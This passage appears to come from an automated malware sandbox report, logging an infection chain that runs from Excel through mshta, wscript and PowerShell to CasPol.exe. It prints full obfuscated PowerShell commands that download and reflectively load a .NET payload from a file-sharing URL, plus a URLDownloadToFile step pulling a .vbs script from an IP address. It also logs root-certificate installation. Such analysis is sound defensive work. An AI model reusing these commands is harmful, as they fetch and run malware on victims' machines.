                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,34_2_0041BCE3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89A3022D push eax; iretd 6_2_000007FE89A30241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89A300BD pushad ; iretd 6_2_000007FE89A300C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004567E0 push eax; ret 34_2_004567FE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0045B9DD push esi; ret 34_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00463EF3 push ds; retf 34_2_00463EEC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00455EAF push ecx; ret 34_2_00455EC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433FF6 push ecx; ret 34_2_00434009

                    Persistence and Installation Behavior

                    barindex
                    Installs new ROOT certificates
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406128 ShellExecuteW,URLDownloadToFileW,34_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,34_2_00419BC4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,34_2_0041BCE3
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
